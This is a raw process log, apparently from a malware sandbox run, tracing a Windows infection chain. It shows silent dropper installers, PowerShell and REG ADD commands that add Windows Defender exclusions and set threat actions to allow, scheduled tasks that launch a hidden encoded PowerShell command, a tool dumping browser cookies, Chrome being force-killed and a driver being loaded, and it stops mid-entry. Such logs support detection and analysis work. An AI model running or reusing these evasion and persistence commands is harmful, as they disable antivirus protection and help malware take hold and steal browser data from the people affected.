C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\White-Pond"
27⤵
PID:2024

C:\Program Files (x86)\White-Pond\7za.exe
"C:\Program Files (x86)\White-Pond\7za.exe" e -p154.61.71.51 winamp-plugins.7z
27⤵
PID:6416

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\White-Pond\setup.exe" -map "C:\Program Files (x86)\White-Pond\WinmonProcessMonitor.sys""
27⤵
- Blocklisted process makes network request
PID:7288

C:\Program Files (x86)\White-Pond\setup.exe
"C:\Program Files (x86)\White-Pond\setup.exe" -map "C:\Program Files (x86)\White-Pond\WinmonProcessMonitor.sys"
28⤵
- Drops file in Program Files directory
- Suspicious behavior: LoadsDriver
PID:4568

C:\Program Files (x86)\White-Pond\7za.exe
"C:\Program Files (x86)\White-Pond\7za.exe" e -p154.61.71.51 winamp.7z
27⤵
PID:6316

C:\Program Files (x86)\White-Pond\setup.exe
"C:\Program Files (x86)\White-Pond\setup.exe" /8-2222
27⤵
PID:7972

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\znsxvxcd.iys\MultitimerFour.exe & exit
25⤵
PID:5596

C:\Users\Admin\AppData\Local\Temp\znsxvxcd.iys\MultitimerFour.exe
C:\Users\Admin\AppData\Local\Temp\znsxvxcd.iys\MultitimerFour.exe
26⤵
PID:7288

C:\Users\Admin\AppData\Local\Temp\VFHCJZLXJ8\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\VFHCJZLXJ8\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
27⤵
- Drops file in Windows directory
PID:2680

C:\Users\Admin\AppData\Local\Temp\VFHCJZLXJ8\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\VFHCJZLXJ8\multitimer.exe" 1 3.1616096033.6053ab211c493 104
28⤵
PID:4108

C:\Users\Admin\AppData\Local\Temp\VFHCJZLXJ8\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\VFHCJZLXJ8\multitimer.exe" 2 3.1616096033.6053ab211c493
29⤵
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
PID:7904

C:\Users\Admin\AppData\Local\Temp\adjoqzbojts\AwesomePoolU1.exe
"C:\Users\Admin\AppData\Local\Temp\adjoqzbojts\AwesomePoolU1.exe"
30⤵
PID:4264

C:\Users\Admin\AppData\Local\Temp\nj1hrmonrch\vict.exe
"C:\Users\Admin\AppData\Local\Temp\nj1hrmonrch\vict.exe" /VERYSILENT /id=535
30⤵
PID:4432

C:\Users\Admin\AppData\Local\Temp\is-EM68L.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-EM68L.tmp\vict.tmp" /SL5="$604EA,870426,780800,C:\Users\Admin\AppData\Local\Temp\nj1hrmonrch\vict.exe" /VERYSILENT /id=535
31⤵
- Drops file in Program Files directory
PID:6672

C:\Users\Admin\AppData\Local\Temp\is-9OFAL.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-9OFAL.tmp\wimapi.exe" 535
32⤵
PID:7116

C:\Users\Admin\AppData\Local\Temp\myxlls33ato\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\myxlls33ato\Setup3310.exe" /Verysilent /subid=577
30⤵
PID:4232

C:\Users\Admin\AppData\Local\Temp\is-I1F97.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-I1F97.tmp\Setup3310.tmp" /SL5="$A03B2,138429,56832,C:\Users\Admin\AppData\Local\Temp\myxlls33ato\Setup3310.exe" /Verysilent /subid=577
31⤵
PID:5372

C:\Users\Admin\AppData\Local\Temp\is-0S2T5.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-0S2T5.tmp\Setup.exe" /Verysilent
32⤵
PID:5448

C:\Users\Admin\AppData\Local\Temp\is-TITM7.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-TITM7.tmp\Setup.tmp" /SL5="$70492,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-0S2T5.tmp\Setup.exe" /Verysilent
33⤵
PID:7628

C:\Users\Admin\AppData\Local\Temp\gd3mptfi5wm\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\gd3mptfi5wm\askinstall24.exe"
30⤵
PID:7544

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
31⤵
- Blocklisted process makes network request
PID:7840

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
32⤵
- Kills process with taskkill
PID:8152

C:\Users\Admin\AppData\Local\Temp\oh2vftnkx1k\axl4f0wpmpz.exe
"C:\Users\Admin\AppData\Local\Temp\oh2vftnkx1k\axl4f0wpmpz.exe" /ustwo INSTALL
30⤵
PID:6936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6936 -s 648
31⤵
- Program crash
PID:7392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6936 -s 660
31⤵
- Program crash
PID:6840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6936 -s 664
31⤵
- Program crash
PID:7680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6936 -s 624
31⤵
- Program crash
PID:7436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6936 -s 892
31⤵
- Program crash
PID:5928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6936 -s 928
31⤵
- Program crash
PID:1424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6936 -s 1084
31⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:6820

C:\Users\Admin\AppData\Local\Temp\V8BH4H78GA\setups.exe
"C:\Users\Admin\AppData\Local\Temp\V8BH4H78GA\setups.exe" ll
27⤵
PID:5292

C:\Users\Admin\AppData\Local\Temp\is-823JG.tmp\setups.tmp
"C:\Users\Admin\AppData\Local\Temp\is-823JG.tmp\setups.tmp" /SL5="$C0056,549376,61440,C:\Users\Admin\AppData\Local\Temp\V8BH4H78GA\setups.exe" ll
28⤵
- Checks computer location settings
PID:7744

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dv5b544b.va0\setup.exe /S /kr /site_id=754 & exit
25⤵
PID:1768

C:\Users\Admin\AppData\Local\Temp\dv5b544b.va0\setup.exe
C:\Users\Admin\AppData\Local\Temp\dv5b544b.va0\setup.exe /S /kr /site_id=754
26⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
PID:7448

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
27⤵
PID:3372

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
28⤵
PID:6656

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
29⤵
PID:4596

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
29⤵
PID:6116

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "grYqnaYKY" /SC once /ST 12:23:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
27⤵
- Creates scheduled task(s)
PID:7592

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "grYqnaYKY"
27⤵
PID:6908

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "grYqnaYKY"
27⤵
PID:5288

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "byGaxHSkIutywxzLoY" /SC once /ST 19:31:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\StaKeEcTUUQSXRfzM\pZTOAVEJdtvzpHa\nmCTJSH.exe\" yu /site_id 754 /S" /V1 /F
27⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:6652

C:\Users\Admin\AppData\Local\Temp\is-HEM8M.tmp\hjjgaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-HEM8M.tmp\hjjgaa.exe" /Verysilent
19⤵
PID:2924

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
20⤵
PID:7260

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
20⤵
PID:7460

C:\Users\Admin\AppData\Local\Temp\cjviz2sr1ne\fdrnjk1bsri.exe
"C:\Users\Admin\AppData\Local\Temp\cjviz2sr1ne\fdrnjk1bsri.exe" /ustwo INSTALL
15⤵
PID:5348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 652
16⤵
- Executes dropped EXE
- Program crash
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:5380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 640
16⤵
- Program crash
PID:8056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 772
16⤵
- Program crash
PID:7216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 808
16⤵
- Program crash
PID:7080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 880
16⤵
- Program crash
PID:5560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 928
16⤵
- Program crash
PID:7608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 1084
16⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:4188

C:\Users\Admin\AppData\Local\Temp\4lsiwmsl451\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\4lsiwmsl451\askinstall24.exe"
15⤵
PID:4392

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
16⤵
PID:5716

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
17⤵
- Kills process with taskkill
PID:6864

C:\Users\Admin\AppData\Local\Temp\ivyuhrseafl\app.exe
"C:\Users\Admin\AppData\Local\Temp\ivyuhrseafl\app.exe" /8-23
15⤵
- Loads dropped DLL
- Drops file in Program Files directory
PID:5520

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Delicate-Fire"
16⤵
PID:6180

C:\Program Files (x86)\Delicate-Fire\7za.exe
"C:\Program Files (x86)\Delicate-Fire\7za.exe" e -p154.61.71.51 winamp-plugins.7z
16⤵
- Drops file in Program Files directory
PID:6752

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Delicate-Fire\app.exe" -map "C:\Program Files (x86)\Delicate-Fire\WinmonProcessMonitor.sys""
16⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:888

C:\Program Files (x86)\Delicate-Fire\app.exe
"C:\Program Files (x86)\Delicate-Fire\app.exe" -map "C:\Program Files (x86)\Delicate-Fire\WinmonProcessMonitor.sys"
17⤵
PID:6444

C:\Program Files (x86)\Delicate-Fire\7za.exe
"C:\Program Files (x86)\Delicate-Fire\7za.exe" e -p154.61.71.51 winamp.7z
16⤵
- Drops file in Program Files directory
PID:7348

C:\Program Files (x86)\Delicate-Fire\app.exe
"C:\Program Files (x86)\Delicate-Fire\app.exe" /8-23
16⤵
PID:4292

C:\Program Files (x86)\Delicate-Fire\app.exe
"C:\Program Files (x86)\Delicate-Fire\app.exe" /8-23
17⤵
- Modifies data under HKEY_USERS
PID:7980

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zp2mqiw0.wdc\setup.exe /S /kr /site_id=754 & exit
10⤵
PID:6920

C:\Users\Admin\AppData\Local\Temp\zp2mqiw0.wdc\setup.exe
C:\Users\Admin\AppData\Local\Temp\zp2mqiw0.wdc\setup.exe /S /kr /site_id=754
11⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
PID:6960

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
12⤵
PID:6128

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
13⤵
PID:7912

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
14⤵
PID:6516

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
14⤵
PID:3948

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gycJxElrw" /SC once /ST 18:18:48 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
12⤵
- Creates scheduled task(s)
PID:2776

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gycJxElrw"
12⤵
PID:6188

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gycJxElrw"
12⤵
PID:6104

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
13⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:6456

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "byGaxHSkIutywxzLoY" /SC once /ST 19:30:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\StaKeEcTUUQSXRfzM\pZTOAVEJdtvzpHa\LSujfCV.exe\" yu /site_id 754 /S" /V1 /F
12⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:6812

C:\Users\Admin\AppData\Local\Temp\is-HLI6I.tmp\hjjgaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-HLI6I.tmp\hjjgaa.exe" /Verysilent
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:5640

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4728

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
- Suspicious use of SetWindowsHookEx
PID:3176

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5256

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:5356

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:1140

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:5688

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\34a7ae7cb22b462fb09ba2f131dba30b /t 5468 /p 5688
1⤵
PID:6684

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:7120

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:6616

C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{4dfdd2be-834c-1f4c-9ef9-3552e4d15a00}\oemvista.inf" "9" "4d14a44ff" "0000000000000164" "WinSta0\Default" "0000000000000168" "208" "c:\program files (x86)\maskvpn\driver\win764"
2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:7004

C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"
2⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:8036

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:7944

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
- Checks SCSI registry key(s)
PID:1256

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
1⤵
PID:5944

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6288

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\eb1f1a6ed7dc4a0c9e5060b2efa3a370 /t 0 /p 6288
1⤵
PID:7308

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:6376

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
1⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies data under HKEY_USERS
PID:7228

C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
MaskVPNUpdate.exe /silent
2⤵
- Drops file in Program Files directory
PID:3208

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:5672

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:8064

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:2908

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:5940

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:6300

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:5692

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4716

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}
1⤵
- Drops file in Program Files directory
- Suspicious behavior: LoadsDriver
PID:6444

C:\Users\Admin\AppData\Local\Temp\StaKeEcTUUQSXRfzM\pZTOAVEJdtvzpHa\LSujfCV.exe
C:\Users\Admin\AppData\Local\Temp\StaKeEcTUUQSXRfzM\pZTOAVEJdtvzpHa\LSujfCV.exe yu /site_id 754 /S
1⤵
- Drops file in System32 directory
PID:4616

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;"
2⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4724

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:7624

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:7468

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:5976

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:4448

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:5296

C:\Windows\SysWOW64\reg.exe
